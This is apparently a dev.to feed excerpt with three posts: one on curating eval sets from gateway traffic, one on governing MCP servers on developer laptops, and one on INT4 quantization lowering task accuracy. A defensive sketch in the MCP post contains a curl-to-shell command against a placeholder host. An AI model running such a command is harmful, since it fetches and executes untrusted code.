            &lt;span class="n"&gt;Model&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;   &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;Input&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;   &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Input&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;Output&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;  &lt;span class="n"&gt;res&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Choices&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Message&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;Latency&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;res&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ExtraFields&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Latency&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;Tokens&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;  &lt;span class="n"&gt;res&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Usage&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;TotalTokens&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The queue drains to Postgres on a separate goroutine so we don't add latency to the request path. We sample 5%, which at our volume is roughly 9,000 captured calls a day.&lt;/p&gt;

&lt;h2&gt;
  
  
  Curating, not dumping
&lt;/h2&gt;

&lt;p&gt;Raw traffic is not an eval set. It's a pile. Most of it is repetitive and low-signal.&lt;/p&gt;

&lt;p&gt;Each week we pull the captured rows and cluster them by embedding. We keep one representative per cluster, drop near-duplicates, and oversample the tail where the agent hit a tool-call error or returned an empty completion. That tail is where regressions hide. The result is around 400 cases a week, which we human-review down to maybe 250 before it joins the frozen suite.&lt;/p&gt;
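&lt;p&gt;A rough sketch of the dedup step, with one simplification stated up front: instead of a real clustering pass it uses a greedy cosine-similarity threshold, which is a swapped-in stand-in rather than the weekly job itself. The row fields (&lt;code&gt;embedding&lt;/code&gt;, &lt;code&gt;tail&lt;/code&gt;) and the 0.95 threshold are assumptions for the example.&lt;/p&gt;

```python
import math


def cosine(u, v):
    """Cosine similarity of two equal-length vectors."""
    dot = sum(x * y for x, y in zip(u, v))
    norm = math.sqrt(sum(x * x for x in u)) * math.sqrt(sum(y * y for y in v))
    return dot / norm if norm else 0.0


def curate(rows, threshold=0.95):
    """Greedy near-duplicate filter over captured rows.

    rows: dicts with "embedding" (list of floats) and "tail" (True when the
    call hit a tool-call error or returned an empty completion).
    Tail rows are always kept; other rows are kept only if no kept row is
    at least `threshold` similar.
    """
    kept = []
    # Visit tail rows first so they become the representatives.
    for row in sorted(rows, key=lambda r: not r["tail"]):
        is_dup = any(cosine(row["embedding"], k["embedding"]) >= threshold for k in kept)
        if row["tail"] or not is_dup:
            kept.append(row)
    return kept


# Toy 2-d embeddings; real ones would come from an embedding model.
rows = [
    {"id": 1, "embedding": [1.0, 0.0], "tail": False},
    {"id": 2, "embedding": [0.99, 0.05], "tail": False},
    {"id": 3, "embedding": [0.0, 1.0], "tail": False},
    {"id": 4, "embedding": [0.98, 0.1], "tail": True},
]
print([r["id"] for r in curate(rows)])
```

&lt;p&gt;Keeping every tail row regardless of similarity is what oversamples the failures; the human review pass still decides what enters the frozen suite.&lt;/p&gt;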

&lt;p&gt;The frozen suite is now 1,900 cases and growing from real inputs. Last month it caught a 6-point drop in tool-call accuracy on our Qwen fine-tune that the old hand-written set sailed straight past, because no human had thought to write a case with three nested function calls.&lt;/p&gt;

&lt;p&gt;You also get the metrics for free. Bifrost emits native Prometheus counters per model, so we already had latency and token distributions to weight the sampling toward expensive calls.&lt;/p&gt;

&lt;h2&gt;
  
  
  Bifrost vs LiteLLM vs Portkey
&lt;/h2&gt;

&lt;p&gt;We looked at three gateways for this. Honest read:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Capability&lt;/th&gt;
&lt;th&gt;Bifrost&lt;/th&gt;
&lt;th&gt;LiteLLM&lt;/th&gt;
&lt;th&gt;Portkey&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Custom logging hook&lt;/td&gt;
&lt;td&gt;Go plugin, in-process&lt;/td&gt;
&lt;td&gt;Python callback / custom logger&lt;/td&gt;
&lt;td&gt;Hosted logs + feedback API&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Self-hosted, full data control&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Self-host on paid tier&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Language&lt;/td&gt;
&lt;td&gt;Go&lt;/td&gt;
&lt;td&gt;Python&lt;/td&gt;
&lt;td&gt;Managed service&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Overhead at high QPS&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Higher under load&lt;/td&gt;
&lt;td&gt;Network hop to their edge&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Setup friction&lt;/td&gt;
&lt;td&gt;Write Go, compile&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pip install&lt;/code&gt;, edit config&lt;/td&gt;
&lt;td&gt;Fastest, UI out of the box&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;LiteLLM was the obvious pick for an ML team. It's Python, so our existing data tooling drops right in, and its provider list is larger. If you want a callback in 10 minutes, it wins. What ruled it out for us was throughput: under our agent burst traffic we hit limits that Bifrost's Go path handled without tuning.&lt;/p&gt;

&lt;p&gt;Portkey has the most polished logging UI and a real feedback API we didn't have to build. The tradeoff is that the data lives in their system unless you're on the self-hosted plan, and a customer contract ruled that out for us. If you want a managed dashboard and don't have a data-residency clause, Portkey is a reasonable call.&lt;/p&gt;

&lt;p&gt;We picked Bifrost because the capture runs in-process with no extra network hop, the plugin is the same binary as the gateway, and the &lt;a href="https://docs.getbifrost.ai/features/observability/default" rel="noopener noreferrer"&gt;logging&lt;/a&gt; plus plugin surface gave us both metrics and raw payloads in one place.&lt;/p&gt;

&lt;h2&gt;
  
  
  Trade-offs and Limitations
&lt;/h2&gt;

&lt;p&gt;Writing a plugin in Go is more work than a Python callback. If your team doesn't read Go, that's a real cost, and LiteLLM is the saner choice.&lt;/p&gt;

&lt;p&gt;Sampling is lossy. At 5% we miss rare inputs, and we've had to bump specific routes to 100% capture when a customer reported a bug we couldn't reproduce.&lt;/p&gt;
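&lt;p&gt;One way to express that per-route bump, sketched in Python for brevity (the plugin itself is Go). The route name, the override table, and the &lt;code&gt;should_capture&lt;/code&gt; helper are hypothetical; the only idea carried over is a stable hash with a 5% default and a 100% override.&lt;/p&gt;

```python
import zlib

DEFAULT_RATE = 0.05
# Hypothetical route being investigated; everything else stays at 5%.
ROUTE_OVERRIDES = {"/v1/agents/billing": 1.0}


def should_capture(request_id, route):
    """Deterministic sampling: the same request id always gets the same answer."""
    rate = ROUTE_OVERRIDES.get(route, DEFAULT_RATE)
    # Map the id to one of 10,000 buckets and capture the lowest rate * 10,000.
    bucket = zlib.crc32(request_id.encode("utf-8")) % 10_000
    return rate * 10_000 > bucket


print(should_capture("req-123", "/v1/agents/billing"))
```

&lt;p&gt;Hashing the request id instead of drawing a random number keeps the decision reproducible, so a replayed request lands in the same bucket.&lt;/p&gt;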

&lt;p&gt;PII is on you. The gateway sees everything, so the plugin has to redact before it writes, and we still run a scrubbing pass before any human looks at a row. Getting this wrong is worse than a stale eval set.&lt;/p&gt;

&lt;p&gt;And capturing traffic doesn't grade it. You still need a scoring harness and labels. The gateway gives you the inputs and outputs. The judgment is the part you can't outsource to infrastructure.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/enterprise/custom-plugins" rel="noopener noreferrer"&gt;Bifrost Custom Plugins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/features/observability/default" rel="noopener noreferrer"&gt;Bifrost Observability and logging&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;Bifrost GitHub repo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.litellm.ai/docs/observability/custom_callback" rel="noopener noreferrer"&gt;LiteLLM custom callbacks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://portkey.ai/docs/product/observability/feedback" rel="noopener noreferrer"&gt;Portkey feedback API&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>mlops</category>
      <category>llm</category>
      <category>machinelearning</category>
      <category>infrastructure</category>
    </item>
    <item>
      <title>The MCP server problem hiding on every developer laptop</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Mon, 22 Jun 2026 06:17:20 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/the-mcp-server-problem-hiding-on-every-developer-laptop-3blh</link>
      <guid>https://dev.to/marcuswwchen/the-mcp-server-problem-hiding-on-every-developer-laptop-3blh</guid>
      <description>&lt;p&gt;&lt;em&gt;MCP servers let AI tools read files, call APIs, and act inside internal systems, and most of them run on individual developer machines with no oversight. This guide explains the security risks of ungoverned MCP servers and how the Bifrost AI gateway and Bifrost Edge bring them under control across the fleet.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;A developer can connect an MCP server to a coding agent in under a minute, granting an AI model the ability to read files, call internal APIs, and take actions inside the systems it touches. Useful as that is, each connection also creates an access path that the security team never reviewed and often cannot see. Across a team of any size, these connections accumulate on individual laptops, and most organizations have no record of which MCP servers exist, what they can reach, or which credentials they hold. Gartner has predicted that by 2028, a quarter of enterprise breaches will trace back to &lt;a href="https://www.gartner.com/en/newsroom/press-releases/2024-10-22-gartner-unveils-top-predictions-for-it-organizations-and-users-in-2025-and-beyond" rel="noopener noreferrer"&gt;AI agent abuse&lt;/a&gt;, and MCP servers are a primary path through which that agent access reaches real systems.&lt;/p&gt;

&lt;h2&gt;
  
  
  What an MCP server is, and why it carries risk
&lt;/h2&gt;

&lt;p&gt;An MCP server is a program that exposes tools, data, or actions to an AI model through the Model Context Protocol, the open standard that lets assistants and coding agents reach beyond their own context into files, APIs, databases, and other systems. The capability is what makes agents useful, and it is also what makes them risky, because a connected server gives a model a path into real infrastructure that is governed only by whatever the protocol and the surrounding setup happen to enforce.&lt;/p&gt;

&lt;p&gt;MCP was built for interoperability and ease of integration first, and it leaves much of the security enforcement to whoever deploys a server. Many MCP servers, especially the ones running locally on a laptop, operate with whatever access the developer granted and no check on individual tool calls unless controls are added around them. The official &lt;a href="https://modelcontextprotocol.io/docs/tutorials/security/security_best_practices" rel="noopener noreferrer"&gt;MCP security guidance&lt;/a&gt; is explicit that a local server can execute arbitrary code, so connecting an untrusted server is equivalent to running untrusted software on the machine.&lt;/p&gt;

&lt;p&gt;The risks fall into a few recurring categories:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Overbroad access is the norm rather than the exception, because a new server is often granted whatever credentials make it work, a database token, a repository-wide key, or a cloud role, and those credentials are rarely scoped down or rotated afterward.&lt;/li&gt;
&lt;li&gt;Prompt injection and tool poisoning exploit how the model reads its inputs, since malicious content in a file, ticket, or web page can carry instructions an agent follows, and a malicious server can describe its tools in ways that steer the model toward unintended actions.&lt;/li&gt;
&lt;li&gt;Supply chain exposure comes with every install, because MCP servers pull in external packages, so a flaw or a planted payload upstream becomes a flaw on every machine that added the server.&lt;/li&gt;
&lt;li&gt;Lateral movement grows as agents chain servers together, reading a repository, querying a database, retrieving a secret, then posting to chat, so a single manipulated step can reach across many systems at once.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Why MCP servers on developer machines are hard to govern
&lt;/h2&gt;

&lt;p&gt;MCP servers on developer machines are hard to govern because they are configured separately inside each app, on each machine, and by each person, which keeps them outside any central inventory. A server added to a coding agent on one engineer's machine is unknown to everyone else, and the configuration can change after anyone reviews it. Check Point Research demonstrated this in 2025 with a flaw in Cursor: once a user approved an MCP configuration, the IDE did not re-validate it, so an attacker could land a harmless config in a shared repository, wait for approval, and later swap in a command that ran on every subsequent launch. The issue was fixed in a later Cursor release, but the pattern it exposed is general.&lt;/p&gt;
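&lt;p&gt;The general defense against that pattern is to bind an approval to the exact content that was approved. The sketch below illustrates the idea only; it is not Cursor's actual fix, and &lt;code&gt;ApprovalStore&lt;/code&gt; and the config shape are hypothetical.&lt;/p&gt;

```python
import hashlib
import json


def config_fingerprint(config):
    """Hash a canonical JSON encoding so key order does not matter."""
    canonical = json.dumps(config, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


class ApprovalStore:
    def __init__(self):
        self._approved = {}  # server name -> fingerprint the user approved

    def approve(self, name, config):
        self._approved[name] = config_fingerprint(config)

    def may_launch(self, name, config):
        # Any change to command, args, or env invalidates the earlier approval.
        return self._approved.get(name) == config_fingerprint(config)


store = ApprovalStore()
benign = {"command": "echo", "args": ["hello"]}
swapped = {"command": "sh", "args": ["-c", "curl example.invalid | sh"]}
store.approve("docs-helper", benign)
print(store.may_launch("docs-helper", benign), store.may_launch("docs-helper", swapped))
```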

&lt;p&gt;The supply chain underneath these servers is an equally serious problem. In April 2026, OX Security disclosed a &lt;a href="https://thehackernews.com/2026/04/anthropic-mcp-design-vulnerability.html" rel="noopener noreferrer"&gt;command execution weakness&lt;/a&gt; in the standard input and output transport of the official MCP software development kit. The weakness was present across every major language version and affected thousands of publicly reachable servers, a reminder that one design default in a widely used component propagates to every project built on it. A control that depends on reviewing each server by hand cannot keep up with that volume or that rate of change.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why existing controls miss them
&lt;/h2&gt;

&lt;p&gt;Traditional controls miss MCP servers because they were built for a different shape of traffic. Network proxies and data loss prevention systems inspect what crosses the corporate network, yet a local MCP server can run entirely on the laptop over standard input and output, with nothing for the network to intercept. API gateways and web application firewalls assume predictable, developer-defined requests, so they cannot validate an agent's identity or judge whether a given tool call is appropriate in context. Blocklists depend on a known list of destinations, and with thousands of servers in circulation and new vulnerabilities disclosed almost weekly, no list keeps pace. Written policy states what engineers should do, but a document does not stop a tool call at the moment it runs.&lt;/p&gt;

&lt;p&gt;Two facts follow from this: MCP servers are configured on the endpoint, so visibility and enforcement of which servers exist have to happen on the endpoint as well; and because the tool calls themselves run through whatever connects the agent to the server, controlling how an approved server is used belongs at a gateway that every call passes through.&lt;/p&gt;

&lt;h2&gt;
  
  
  How the Bifrost AI gateway and Bifrost Edge govern MCP servers
&lt;/h2&gt;

&lt;p&gt;Governing MCP servers well takes the same two layers that govern any AI traffic: a place to define and enforce policy, and a way to apply that policy on every machine. Bifrost, the &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;open-source AI gateway&lt;/a&gt; built by Maxim AI, is also an &lt;a href="https://docs.getbifrost.ai/mcp/overview" rel="noopener noreferrer"&gt;MCP gateway&lt;/a&gt;, so approved MCP servers connect through it, and it controls which tools each request can use and records every call. &lt;a href="https://docs.getbifrost.ai/edge/overview" rel="noopener noreferrer"&gt;Bifrost Edge&lt;/a&gt; extends that control to the endpoint, where the servers are actually configured.&lt;/p&gt;

&lt;p&gt;The two layers cover the two halves of the problem. Edge identifies which MCP servers exist on the fleet and blocks the ones that are not allowed, and the gateway governs how the approved servers are used, down to the individual tool and the individual person.&lt;/p&gt;

&lt;h3&gt;
  
  
  See every MCP server across the fleet
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://docs.getbifrost.ai/edge/mcp-governance" rel="noopener noreferrer"&gt;Bifrost Edge inventories the MCP servers&lt;/a&gt; configured inside each AI app on every machine and builds a live inventory of which servers are present, on which apps, and across how many devices. For many organizations this is the first complete answer to a basic question about which MCP servers are actually running on the fleet, replacing guesswork with real data. MCP discovery covers the &lt;a href="https://docs.getbifrost.ai/edge/supported-applications" rel="noopener noreferrer"&gt;AI apps that support the protocol&lt;/a&gt; today, including Claude Code, Claude Desktop, Gemini CLI, OpenCode, Codex, and Cursor.&lt;/p&gt;

&lt;h3&gt;
  
  
  Allow or deny each server, enforced on the device
&lt;/h3&gt;

&lt;p&gt;Once the inventory exists, administrators allow or deny each MCP server individually, and Edge enforces that decision on the machine, even for an app that had the server configured before the policy existed. When Edge detects a server it has not seen, it raises a pending approval in the admin console, and administrators choose whether newly detected servers are allowed or blocked while that approval is pending. A denied server cannot be used, rather than being discouraged by a policy no one enforces.&lt;/p&gt;

&lt;h3&gt;
  
  
  Control which tools each person can call
&lt;/h3&gt;

&lt;p&gt;On the gateway, &lt;a href="https://docs.getbifrost.ai/features/governance/mcp-tools" rel="noopener noreferrer"&gt;MCP tool filtering&lt;/a&gt; decides which tools an approved server actually exposes, per virtual key. The starting point is deny by default, so a virtual key with no MCP configuration receives no tools, and an administrator builds an explicit list of the approved clients and tools each key may use. &lt;a href="https://docs.getbifrost.ai/mcp/auth/per-user-oauth" rel="noopener noreferrer"&gt;Per-user OAuth&lt;/a&gt; then ties each upstream connection to the individual using it, so a person's tool calls run under their own scoped credentials instead of a single shared token that grants the same broad access to everyone.&lt;/p&gt;
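&lt;p&gt;The deny-by-default rule is easy to state in code. This is a sketch of the logic only, with a made-up policy table; it is not Bifrost's configuration format or API.&lt;/p&gt;

```python
# Hypothetical policy: virtual key -> MCP client -> allowed tool names.
POLICY = {
    "vk-data-team": {
        "postgres": {"run_query"},
        "github": {"read_file", "list_issues"},
    },
    "vk-intern": {},  # key exists but has no MCP configuration
}


def allowed_tools(virtual_key, client, offered_tools):
    """Return only the tools this key may see; unknown keys or clients get nothing."""
    allowed = POLICY.get(virtual_key, {}).get(client, set())
    return [tool for tool in offered_tools if tool in allowed]


print(allowed_tools("vk-data-team", "github", ["read_file", "delete_repo"]))
print(allowed_tools("vk-intern", "github", ["read_file", "delete_repo"]))
```

&lt;p&gt;The point of the nested lookups with empty defaults is that a missing entry at any level yields an empty tool list, so forgetting to configure a key fails closed.&lt;/p&gt;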

&lt;h3&gt;
  
  
  Keep an audit trail of every tool call
&lt;/h3&gt;

&lt;p&gt;Because approved MCP traffic flows through Bifrost, every tool call is recorded with the identity behind it, what was called, and what came back. That record turns an agent action from an unattributable event into something a security or compliance team can review, which is exactly what the scattered, machine-by-machine setup made impossible before. Edge reaches every machine through the &lt;a href="https://docs.getbifrost.ai/edge/deployment-mdm" rel="noopener noreferrer"&gt;device management platform&lt;/a&gt; an organization already runs, so the inventory and the enforcement apply across the fleet rather than to whichever laptops happened to opt in.&lt;/p&gt;

&lt;h2&gt;
  
  
  Common questions about MCP server security
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What is an MCP server?
&lt;/h3&gt;

&lt;p&gt;An MCP server is a program that gives an AI model access to specific tools, data, or actions through the Model Context Protocol. A coding agent might use one MCP server to read a repository, another to query a database, and another to file an issue, with each server defining what the model is allowed to do.&lt;/p&gt;

&lt;h3&gt;
  
  
  Are MCP servers a security risk?
&lt;/h3&gt;

&lt;p&gt;MCP servers are a security risk when they run without oversight, because they grant AI models real access to internal systems and often hold broad, long-lived credentials. The risk lies not in the protocol itself but in ungoverned use, meaning servers configured on individual machines, with access no one reviewed and tool calls no one can see.&lt;/p&gt;

&lt;h3&gt;
  
  
  How do you govern MCP servers across an organization?
&lt;/h3&gt;

&lt;p&gt;Governing MCP servers across an organization takes both visibility and enforcement. An endpoint layer such as Bifrost Edge inventories the servers configured on every machine and enforces which ones are allowed, while an MCP gateway such as Bifrost controls which tools each person can call and records every call for audit.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where this leaves engineering and security teams
&lt;/h2&gt;

&lt;p&gt;MCP servers are now part of how software gets built, and that is not going to reverse. The teams that stay ahead of the risk treat it as a visibility problem first and an enforcement problem second, governing servers where they are configured and where their tool calls run rather than trusting that a policy document will hold.&lt;/p&gt;

&lt;p&gt;Pairing the Bifrost AI gateway with Bifrost Edge covers both halves: the gateway controls which tools each person can use and logs every call, and Edge, currently in alpha, brings every MCP server on every machine into one inventory with enforcement on the device. Teams weighing the risk of ungoverned MCP servers can see how the combined approach works on the &lt;a href="https://docs.getbifrost.ai/edge/overview" rel="noopener noreferrer"&gt;Bifrost Edge overview&lt;/a&gt; and register there for alpha access.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Perplexity held flat after INT4. Task accuracy dropped 7 points.</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Fri, 19 Jun 2026 06:39:22 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/perplexity-held-flat-after-int4-task-accuracy-dropped-7-points-4fg6</link>
      <guid>https://dev.to/marcuswwchen/perplexity-held-flat-after-int4-task-accuracy-dropped-7-points-4fg6</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR: We quantized a fine-tuned 14B agent model to INT4 with GPTQ. Perplexity moved 0.04. We almost shipped it. A domain eval suite caught a 7-point drop in multi-step task completion that perplexity never saw. Perplexity is a terrible acceptance gate for quantized models.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;We run model fine-tuning and eval for enterprise agent automation at Nexus Labs. Series B, small team, ten people who touch the eval pipeline. The model in question was a Qwen2.5-14B fine-tune we use for structured workflow execution. Customer-facing. It matters when it's wrong.&lt;/p&gt;

&lt;p&gt;The plan was boring. Quantize to INT4 to fit two replicas on one A100 instead of one, cut serving cost roughly in half. Standard move. We picked GPTQ with a 128 group size, ran calibration on 512 samples from our training distribution, and measured perplexity before and after.&lt;/p&gt;

&lt;h2&gt;
  
  
  The number that lied
&lt;/h2&gt;

&lt;p&gt;Perplexity on our held-out set: 3.81 full precision, 3.85 after INT4. That's a 1% move. Nothing. By the old folklore, a quantization that holds perplexity is a quantization you ship.&lt;/p&gt;

&lt;p&gt;So we ran the actual eval suite. Not perplexity. The 340-case adversarial set we built for this product, where each case is a multi-step task with a programmatic pass/fail check on the final state.&lt;/p&gt;

&lt;p&gt;Task completion went from 81.2% to 74.1%. Seven points. On a metric customers feel directly.&lt;/p&gt;

&lt;p&gt;The failures clustered. Long sequences, six steps or more, where the model had to hold a constraint from step one and apply it at step five. The INT4 model dropped the constraint. Perplexity averages token-level surprise across the whole corpus, so a few critical tokens going wrong in a 400-token trajectory barely move the mean. The eval that scores the trajectory outcome sees it immediately.&lt;/p&gt;
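&lt;p&gt;The arithmetic is worth seeing once. The sketch below builds a 400-token trajectory where every token sits at the FP16 average, then assumes exactly three constraint-carrying tokens each become 4x less likely. The positions and the 4x factor are invented for illustration; they are not measurements from our model.&lt;/p&gt;

```python
import math


def perplexity(token_nlls):
    """Perplexity is exp of the mean per-token negative log-likelihood."""
    return math.exp(sum(token_nlls) / len(token_nlls))


base_nll = math.log(3.81)  # per-token NLL that gives perplexity 3.81
trajectory = [base_nll] * 400

# Assumption: three critical tokens each become 4x less likely.
damaged = list(trajectory)
for pos in (120, 250, 330):
    damaged[pos] = base_nll + math.log(4)

print(round(perplexity(trajectory), 2), round(perplexity(damaged), 2))
```

&lt;p&gt;Three badly wrong tokens out of 400 add about 0.01 to the mean log-loss, which shifts perplexity by roughly 1%. A pass/fail check on the final state only needs one of those tokens to be the constraint.&lt;/p&gt;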

&lt;p&gt;Here is roughly what we measured across the gates:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;FP16&lt;/th&gt;
&lt;th&gt;INT4 (GPTQ)&lt;/th&gt;
&lt;th&gt;Delta&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Perplexity (held-out)&lt;/td&gt;
&lt;td&gt;3.81&lt;/td&gt;
&lt;td&gt;3.85&lt;/td&gt;
&lt;td&gt;+0.04&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MMLU (5-shot)&lt;/td&gt;
&lt;td&gt;71.4%&lt;/td&gt;
&lt;td&gt;70.9%&lt;/td&gt;
&lt;td&gt;-0.5 pts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Task completion (our suite)&lt;/td&gt;
&lt;td&gt;81.2%&lt;/td&gt;
&lt;td&gt;74.1%&lt;/td&gt;
&lt;td&gt;-7.1 pts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Constraint-retention subset&lt;/td&gt;
&lt;td&gt;88%&lt;/td&gt;
&lt;td&gt;69%&lt;/td&gt;
&lt;td&gt;-19 pts&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;MMLU barely moved either. Generic benchmarks were as blind as perplexity here. The damage was concentrated in exactly the capability our product depends on, and only the domain suite measured it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why averaged metrics miss this
&lt;/h2&gt;

&lt;p&gt;Quantization error isn't uniform. INT4 rounds each group of weights onto just 16 levels, and our read of the failures is that the layers handling long-range dependency, attention projections deep in the stack, took the error worst. A model can stay fluent token-to-token while losing the thread across a long context. Fluency is what perplexity rewards. Following a constraint across 400 tokens is not fluency.&lt;/p&gt;

&lt;p&gt;The lesson we keep relearning: the model is the easy part. The thing that tells you whether the model is good enough is the hard part, and it's almost never a single scalar.&lt;/p&gt;

&lt;h2&gt;
  
  
  What we changed
&lt;/h2&gt;

&lt;p&gt;We made the domain suite a hard gate for any inference-level change. Quantization, a vLLM version bump, a new kernel, all of it has to clear the trajectory eval, not perplexity.&lt;/p&gt;

&lt;p&gt;To get clean comparisons we shadow every eval case against two backends at once: the FP16 reference on one endpoint and the candidate INT4 build on another. We route both through Bifrost, our gateway, so the eval harness builds one OpenAI-format request and sends it to both backends behind the same interface, with only the &lt;code&gt;model&lt;/code&gt; field changing. That removed a class of bugs where prompt formatting drifted between the two test paths and made the diff look bigger than it was.&lt;/p&gt;

&lt;p&gt;The harness itself is dull on purpose:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;asyncio&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;httpx&lt;/span&gt;

&lt;span class="n"&gt;GATEWAY&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;http://localhost:8080/v1/chat/completions&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;run_case&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;state&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;initial_state&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;step&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;steps&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
